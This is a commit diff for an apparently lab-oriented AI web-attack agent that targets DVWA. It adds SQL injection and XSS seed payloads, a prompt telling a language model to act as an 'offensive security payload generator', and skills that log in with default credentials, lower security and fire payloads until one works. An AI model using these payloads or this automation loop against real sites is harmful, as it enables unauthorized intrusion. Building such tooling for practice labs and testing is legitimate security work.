Add files via upload

Joas A Santos
2025-08-17 11:32:14 -03:00
committed by GitHub
parent 83be0e8210
commit 90d5bafed7
21 changed files with 376 additions and 4 deletions

requirements.txt

@@ -5,3 +5,4 @@ pydantic>=2.8.0
tenacity>=8.2.3
rich>=13.7.1
python-dotenv>=1.0.1
requests>=2.32.3

src/agent/orchestrator.py

@@ -3,7 +3,7 @@ For MVP we call hardcoded skills; planner integration is available for future lo
"""
from typing import Dict, Any, Callable
from . import planner
from ..skills import login, xss_reflected_low, sqli_low, xss_stored_low, xss_dom_low
from ..skills import login, xss_reflected_low, sqli_low, xss_stored_low, xss_dom_low, xss_reflected_low_smart, sqli_low_smart

SKILLS: Dict[str, Callable[[str], Dict[str, Any]]] = {
    "login": lambda base: login.run(base),
@@ -11,6 +11,8 @@ SKILLS: Dict[str, Callable[[str], Dict[str, Any]]] = {
    "xss_reflected_low": lambda base: xss_reflected_low.run(base),
    "xss_dom_low": lambda base: xss_dom_low.run(base),
    "sqli_low": lambda base: sqli_low.run(base),
    "sqli_low_smart": lambda base: sqli_low_smart.run(base),
    "xss_reflected_low_smart": lambda base: xss_reflected_low_smart.run(base),
}

def run_skill(base_url: str, skill: str) -> Dict[str, Any]:
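
The hunk ends at the `run_skill` signature, so its body is not shown. A minimal sketch of the dispatch this registry implies; the error handling is an assumption, not part of the diff:

```python
def run_skill(base_url: str, skill: str) -> Dict[str, Any]:
    # Look the skill up in the registry and invoke it against the target.
    if skill not in SKILLS:
        raise ValueError(f"unknown skill: {skill}")  # assumed failure mode
    return SKILLS[skill](base_url)
```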

src/agent/planner.py

@@ -1,4 +1,39 @@
from ..openai_client import plan_next_action
from typing import Dict, Any, List
from ..models import get_provider

_provider = get_provider()

def decide(context: dict) -> dict:
    return plan_next_action(context)
    """Keeps compatibility with the old interface: plan one simple action."""
    system = "You are a safe web security agent. Return STRICT JSON."
    user = (
        "Given this context, propose one next action as JSON:\n"
        "{'tool':'navigate|fill_form|click|noop','target':'url|selector','data':null|{...},'why':'short'}\n\n"
        f"Context:\n{context}"
    )
    res = _provider.complete_json(system, user)
    if not isinstance(res, dict):
        res = {"tool": "noop", "target": "", "data": None, "why": "fallback"}
    return res

def propose_fuzz_payloads(category: str, page_context: dict, seeds: List[str], budget: int = 8) -> List[str]:
    """Asks the model for payload variations based on the seeds and the page context."""
    system = "You are an offensive security payload generator. Return STRICT JSON: {'payloads': [..]}."
    user = (
        f"Category: {category}\n"
        f"Seeds: {seeds}\n"
        f"Page context (inputs, hints, server msgs): {page_context}\n"
        f"Generate up to {budget} diverse payloads. Focus on low-noise, high-signal candidates for DVWA Low.\n"
        "Only return JSON: {'payloads': ['...','...']}."
    )
    res = _provider.complete_json(system, user)
    pls = res.get("payloads", []) if isinstance(res, dict) else []
    # sanity filter: keep unique, non-empty strings under 256 chars
    uniq = []
    for p in pls:
        if not isinstance(p, str):
            continue
        p = p.strip()
        if p and p not in uniq and len(p) < 256:
            uniq.append(p)
    # fallback: if the model returned nothing usable, use the seeds
    return uniq or seeds[:budget]
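
For illustration, a hedged example of calling `propose_fuzz_payloads`; the seed and context values below are hypothetical, but the fallback contract (seeds come back when the model yields nothing usable) follows directly from the code above:

```python
payloads = propose_fuzz_payloads(
    category="XSSReflectedLow",
    page_context={"form": "name", "page": "xss_reflected"},  # hypothetical context
    seeds=['<script>alert(1)</script>'],
    budget=4,
)
# Always a non-empty list: model proposals when the provider returns valid
# JSON, otherwise the seeds themselves (capped at `budget`).
assert payloads, "seeds guarantee a non-empty result"
```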

src/config.py

@@ -2,8 +2,22 @@ from pydantic import BaseModel
import os

class Settings(BaseModel):
    # Provider: "openai", "ollama", "llamacpp"
    model_provider: str = os.getenv("MODEL_PROVIDER", "openai").lower()

    # OpenAI
    openai_api_key: str = os.getenv("OPENAI_API_KEY", "")
    openai_model: str = os.getenv("OPENAI_MODEL", "gpt-5")

    # Ollama (LLaMA)
    llama_base_url: str = os.getenv("LLAMA_BASE_URL", "http://localhost:11434")
    llama_model: str = os.getenv("LLAMA_MODEL", "llama3.1")  # e.g. llama3.1, llama3.2:latest

    # llama.cpp (local Python bindings)
    llamacpp_model_path: str = os.getenv("LLAMACPP_MODEL_PATH", "")
    llamacpp_n_threads: int = int(os.getenv("LLAMACPP_N_THREADS", "4"))

    # Safety / target
    allowlist_hosts: list[str] = [h.strip() for h in os.getenv("ALLOWLIST_HOSTS", "localhost,127.0.0.1,dvwa").split(",")]
    dvwa_url_env: str = os.getenv("DVWA_URL", "").strip()
    headless: bool = os.getenv("HEADLESS", "true").lower() == "true"
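
Since every field reads the environment at class-definition time, configuration is a matter of exporting variables before the first import. A minimal sketch, assuming the module lives at `src/config.py` and exposes a `settings` instance (as the `from ..config import settings` imports elsewhere in this commit suggest):

```python
import os

# Select the Ollama backend instead of the default OpenAI one.
os.environ["MODEL_PROVIDER"] = "ollama"
os.environ["LLAMA_BASE_URL"] = "http://localhost:11434"
os.environ["LLAMA_MODEL"] = "llama3.1"
os.environ["DVWA_URL"] = "http://localhost:8080"

from src.config import settings  # import path assumed

print(settings.model_provider)   # -> "ollama"
print(settings.allowlist_hosts)  # -> ["localhost", "127.0.0.1", "dvwa"]
```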

src/fuzz/engine.py Normal file

@@ -0,0 +1,20 @@
from typing import List, Dict, Any, Callable
from ..agent.planner import propose_fuzz_payloads

def generate_candidates(category: str, page_ctx: dict, seeds: List[str], budget: int = 8) -> List[str]:
    """Combine the seeds with LLM-proposed payloads."""
    props = propose_fuzz_payloads(category, page_ctx, seeds, budget)
    pool = list(dict.fromkeys(seeds + props))  # dedupe while preserving order
    return pool[: max(budget, len(seeds))]

def try_candidates(try_func: Callable[[str], Dict[str, Any]], candidates: List[str]) -> Dict[str, Any]:
    """Run candidates until one succeeds, returning the best result seen."""
    best = {"ok": False}
    for p in candidates:
        res = try_func(p)
        if res.get("ok"):
            return res
        # keep the "almost good" result if it carries a longer evidence excerpt
        if not best.get("ok") and len(res.get("evidence_excerpt", "")) > len(best.get("evidence_excerpt", "")):
            best = res
    return best
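
A self-contained usage sketch of the two functions above; `try_one` here is a stand-in probe (the real skills drive a browser), and the import paths are assumed from the file layout:

```python
from src.fuzz.engine import generate_candidates, try_candidates  # paths assumed
from src.fuzz.seeds import SQLI_SEEDS

def try_one(payload: str) -> dict:
    # Stand-in probe: a real skill submits the payload and inspects the HTML.
    hit = "1'='1" in payload
    return {"ok": hit, "evidence_excerpt": payload if hit else ""}

# Providers degrade to {} on failure, so this falls back to the seeds offline.
candidates = generate_candidates("SQLiLow", {"base_len": 1200}, SQLI_SEEDS, budget=6)
result = try_candidates(try_one, candidates)
print(result["ok"], result.get("evidence_excerpt", ""))
```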

src/fuzz/seeds.py Normal file

@@ -0,0 +1,19 @@
SQLI_SEEDS = [
    "1' OR '1'='1' -- ",
    "' OR '1'='1' -- ",
    "1' OR 1=1 -- ",
    "1' OR '1'='1'#",
]

XSS_REFLECTED_SEEDS = [
    '<script>alert("x")</script>',
    '"><script>alert(1)</script>',
    '<img src=x onerror=alert(1)>',
    '<svg onload=alert(1)>',
]

XSS_DOM_SEEDS = [
    '<script>alert("domxss")</script>',
    '"><script>alert(document.domain)</script>',
    '<img src=x onerror=alert("dom")>',
]

src/models/__init__.py Normal file

@@ -0,0 +1 @@
from .provider import get_provider

src/models/provider.py Normal file

@@ -0,0 +1,144 @@
from typing import Dict, Any, List
from ..config import settings

# OpenAI (new 1.x SDK)
def _openai_client():
    from openai import OpenAI
    return OpenAI(api_key=settings.openai_api_key)

class BaseProvider:
    def name(self) -> str: ...

    def complete_json(self, system: str, user: str) -> Dict[str, Any]:
        """Return parsed JSON (tool choice / payload proposals)."""
        raise NotImplementedError

class OpenAIProvider(BaseProvider):
    def name(self):
        return "openai"

    def complete_json(self, system: str, user: str) -> Dict[str, Any]:
        """
        First try Chat Completions with a JSON response_format.
        If the SDK/model version does not support it, fall back to plain text plus parsing.
        Finally, try the Responses API without response_format.
        """
        import json, re
        client = _openai_client()
        # 1) Chat Completions with JSON (preferred)
        try:
            chat = client.chat.completions.create(
                model=settings.openai_model,
                messages=[
                    {"role": "system", "content": system},
                    {"role": "user", "content": user + "\nReturn STRICT JSON only."},
                ],
                temperature=0.2,
                top_p=0.9,
                # some SDK versions support this; if not, we fall through to the except
                response_format={"type": "json_object"},
            )
            txt = chat.choices[0].message.content or "{}"
            return json.loads(txt)
        except Exception:
            pass
        # 2) Chat Completions without response_format (heuristic parse)
        try:
            chat = client.chat.completions.create(
                model=settings.openai_model,
                messages=[
                    {"role": "system", "content": system},
                    {"role": "user", "content": user + "\nReturn STRICT JSON only."},
                ],
                temperature=0.2,
                top_p=0.9,
            )
            txt = chat.choices[0].message.content or "{}"
            try:
                return json.loads(txt)
            except Exception:
                m = re.search(r"\{.*\}", txt, re.S)
                return json.loads(m.group(0)) if m else {}
        except Exception:
            pass
        # 3) Responses API (fallback), WITHOUT response_format
        try:
            resp = client.responses.create(
                model=settings.openai_model,
                input=[
                    {"role": "system", "content": system},
                    {"role": "user", "content": user + "\nReturn STRICT JSON only."},
                ],
                temperature=0.2,
                top_p=0.9,
                max_output_tokens=600,
            )
            # different SDK versions expose different fields:
            try:
                txt = resp.output_text
            except Exception:
                # try to extract from the structured content
                try:
                    blocks = resp.output
                    # concatenate the text pieces
                    txt = "".join([b.text if hasattr(b, "text") else "" for b in (blocks or [])]) or "{}"
                except Exception:
                    txt = "{}"
            try:
                return json.loads(txt)
            except Exception:
                m = re.search(r"\{.*\}", txt, re.S)
                return json.loads(m.group(0)) if m else {}
        except Exception:
            # last fallback: empty dict (the engine then uses the seeds)
            return {}

class OllamaProvider(BaseProvider):
    def name(self):
        return "ollama"

    def complete_json(self, system: str, user: str) -> Dict[str, Any]:
        import requests, json
        url = settings.llama_base_url.rstrip("/") + "/api/generate"
        prompt = f"[SYSTEM]{system}\n[USER]{user}\nReturn STRICT JSON only."
        r = requests.post(url, json={
            "model": settings.llama_model,
            "prompt": prompt,
            "stream": False,
            "options": {"temperature": 0.2},
        }, timeout=120)
        r.raise_for_status()
        txt = r.json().get("response", "{}")
        try:
            return json.loads(txt)
        except Exception:
            # robust attempt: extract the {...} block
            import re
            m = re.search(r"\{.*\}", txt, re.S)
            return json.loads(m.group(0)) if m else {}

class LlamaCppProvider(BaseProvider):
    def name(self):
        return "llamacpp"

    def complete_json(self, system: str, user: str) -> Dict[str, Any]:
        # requires: pip install llama-cpp-python
        from llama_cpp import Llama
        import json, re
        llm = Llama(model_path=settings.llamacpp_model_path, n_threads=settings.llamacpp_n_threads, verbose=False)
        prompt = f"[SYSTEM]{system}\n[USER]{user}\nReturn STRICT JSON only."
        out = llm(prompt=prompt, max_tokens=600, temperature=0.2)
        txt = out["choices"][0]["text"]
        try:
            return json.loads(txt)
        except Exception:
            m = re.search(r"\{.*\}", txt, re.S)
            return json.loads(m.group(0)) if m else {}

def get_provider() -> BaseProvider:
    prov = settings.model_provider
    if prov == "openai":
        return OpenAIProvider()
    if prov == "ollama":
        return OllamaProvider()
    if prov == "llamacpp":
        return LlamaCppProvider()
    return OpenAIProvider()
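
A short round trip through the abstraction; the backend is picked by `MODEL_PROVIDER`, and since every branch above swallows its errors into `{}`, callers should guard the result. The prompt below is illustrative only and the import path is assumed:

```python
from src.models import get_provider  # path assumed

provider = get_provider()
plan = provider.complete_json(
    system="You are a safe web security agent. Return STRICT JSON.",
    user="Propose one next action for context {'page': 'login'}.",
)
# All providers degrade to {} on failure, so default every field.
tool = plan.get("tool", "noop")
print(provider.name(), tool)
```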

src/main.py

@@ -5,7 +5,7 @@ from .agent.orchestrator import run_skill
def main():
    ap = argparse.ArgumentParser()
    ap.add_argument('--target', required=False, default=settings.dvwa_url_env or "http://localhost:8080")
    ap.add_argument('--skill', required=True, choices=['login', 'xss_reflected_low', 'sqli_low', 'xss_stored_low', 'xss_dom_low'])
    ap.add_argument('--skill', required=True, choices=['login', 'xss_reflected_low', 'sqli_low', 'xss_stored_low', 'xss_dom_low', 'sqli_low_smart', 'xss_reflected_low_smart'])
    args = ap.parse_args()
    result = run_skill(args.target, args.skill)

src/skills/sqli_low_smart.py Normal file

@@ -0,0 +1,68 @@
from pathlib import Path
from urllib.parse import urlencode
from ..tools.browser import Browser
from ..detectors.sql_errors import has_sql_error
from ..fuzz.engine import generate_candidates, try_candidates
from ..fuzz.seeds import SQLI_SEEDS

def run(base_url: str, budget: int = 8) -> dict:
    with Browser(base_url) as b:
        # login
        b.goto("/login.php")
        b.page.wait_for_selector('input[name="username"]', timeout=15000)
        b.fill('input[name="username"]', "admin")
        b.fill('input[name="password"]', "password")
        b.click('input[type="submit"]')
        b.page.wait_for_load_state("domcontentloaded")

        # best effort: set security level to Low
        try:
            b.goto("/security.php")
            b.page.wait_for_selector('select[name="security"]', timeout=5000)
            b.page.select_option('select[name="security"]', 'low')
            b.click('input[type="submit"]')
            b.page.wait_for_load_state("domcontentloaded")
        except Exception:
            pass

        # baseline response for the size-delta heuristic
        b.goto("/vulnerabilities/sqli/?id=1&Submit=Submit")
        b.page.wait_for_load_state("domcontentloaded")
        base_html = b.content()
        base_len = len(base_html)

        def success_metrics(html: str):
            if has_sql_error(html):
                return True, "SQL error pattern"
            if "First name" in html and "Surname" in html:
                return True, "User table markers"
            if "User ID" in html and "exists in the database" in html:
                return True, "Exists message"
            if len(html) > base_len + 150:
                return True, "Response size grew vs baseline"
            return False, ""

        # generate candidates with the LLM (simple page context)
        page_ctx = {"markers": ["id input", "Submit button"], "base_len": base_len}
        candidates = generate_candidates("SQLiLow", page_ctx, SQLI_SEEDS, budget)

        def try_one(p: str):
            qs = urlencode({"id": p, "Submit": "Submit"})
            b.goto(f"/vulnerabilities/sqli/?{qs}")
            b.page.wait_for_load_state("domcontentloaded")
            html = b.content()
            ok, reason = success_metrics(html)
            # screenshot as evidence
            screens = Path(__file__).resolve().parents[2].parent / "screens"
            screens.mkdir(parents=True, exist_ok=True)
            shot = screens / "sqli_low_smart.png"
            b.page.screenshot(path=str(shot), full_page=True)
            return {
                "ok": ok,
                "vector": "SQLi (Low) SMART",
                "payload": p,
                "reason": reason,
                "evidence_excerpt": html[:1200],
                "screenshot": str(shot),
                "url": b.page.url,
            }

        return try_candidates(try_one, candidates)
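
`src/detectors/sql_errors.py` is not included in this commit; a plausible sketch of `has_sql_error`, assuming it pattern-matches common MySQL/MariaDB error strings of the kind DVWA Low surfaces (the exact patterns are guesses, not the author's code):

```python
import re

# Assumed error signatures; the real detector may use a different list.
_SQL_ERROR_PATTERNS = [
    r"You have an error in your SQL syntax",
    r"Warning:\s*mysqli?_",
    r"Unclosed quotation mark",
    r"SQLSTATE\[\w+\]",
]

def has_sql_error(html: str) -> bool:
    return any(re.search(p, html, re.I) for p in _SQL_ERROR_PATTERNS)
```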

src/skills/xss_reflected_low_smart.py Normal file

@@ -0,0 +1,68 @@
from pathlib import Path
from ..tools.browser import Browser
from ..fuzz.engine import generate_candidates, try_candidates
from ..fuzz.seeds import XSS_REFLECTED_SEEDS

def run(base_url: str, budget: int = 8) -> dict:
    with Browser(base_url) as b:
        # login
        b.goto("/login.php")
        b.page.wait_for_selector('input[name="username"]', timeout=15000)
        b.fill('input[name="username"]', "admin")
        b.fill('input[name="password"]', "password")
        b.click('input[type="submit"]')
        b.page.wait_for_load_state("domcontentloaded")

        # best effort: set security level to Low
        try:
            b.goto("/security.php")
            b.page.wait_for_selector('select[name="security"]', timeout=5000)
            b.page.select_option('select[name="security"]', 'low')
            b.click('input[type="submit"]')
            b.page.wait_for_load_state("domcontentloaded")
        except Exception:
            pass

        # alert() hook: record any dialog a payload triggers
        alert = {"ok": False, "message": ""}

        def on_dialog(d):
            alert["ok"] = True
            alert["message"] = d.message
            d.accept()

        b.page.on("dialog", on_dialog)

        # page context and candidates
        b.goto("/vulnerabilities/xss_r/")
        b.page.wait_for_selector('input[name="name"]', timeout=15000)
        page_ctx = {"form": "name", "page": "xss_reflected"}
        candidates = generate_candidates("XSSReflectedLow", page_ctx, XSS_REFLECTED_SEEDS, budget)

        def try_one(p: str):
            b.goto("/vulnerabilities/xss_r/")
            b.page.wait_for_selector('input[name="name"]', timeout=15000)
            b.fill('input[name="name"]', p)
            b.click('input[type="submit"]')
            b.page.wait_for_timeout(900)
            html = b.content()
            raw_present = "<script" in html and "alert(" in html
            ok = alert["ok"] or raw_present
            reason = (f'alert fired: "{alert["message"]}"' if alert["ok"]
                      else "raw <script> present" if raw_present else "no execution")
            screens = Path(__file__).resolve().parents[2].parent / "screens"
            screens.mkdir(parents=True, exist_ok=True)
            shot = screens / "xss_reflected_low_smart.png"
            b.page.screenshot(path=str(shot), full_page=True)
            return {
                "ok": ok,
                "vector": "Reflected XSS (Low) SMART",
                "payload": p,
                "reason": reason,
                "evidence_contains": p if raw_present else html[:1000],
                "screenshot": str(shot),
                "url": b.page.url,
            }

        return try_candidates(try_one, candidates)
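
`src/tools/browser.py` is also outside this diff; a minimal Playwright-based sketch consistent with how both skills use it (context-manager lifetime, a `page` attribute, and `goto`/`fill`/`click`/`content` helpers). Launch options and the headless flag are assumptions:

```python
from playwright.sync_api import sync_playwright

class Browser:
    """Thin sync-Playwright wrapper matching the skills' usage (assumed)."""

    def __init__(self, base_url: str, headless: bool = True):
        self.base_url = base_url.rstrip("/")
        self.headless = headless

    def __enter__(self) -> "Browser":
        self._pw = sync_playwright().start()
        self._browser = self._pw.chromium.launch(headless=self.headless)
        self.page = self._browser.new_page()
        return self

    def __exit__(self, *exc) -> None:
        self._browser.close()
        self._pw.stop()

    def goto(self, path: str) -> None:
        # Paths in the skills are site-relative, so join against base_url.
        self.page.goto(self.base_url + path)

    def fill(self, selector: str, value: str) -> None:
        self.page.fill(selector, value)

    def click(self, selector: str) -> None:
        self.page.click(selector)

    def content(self) -> str:
        return self.page.content()
```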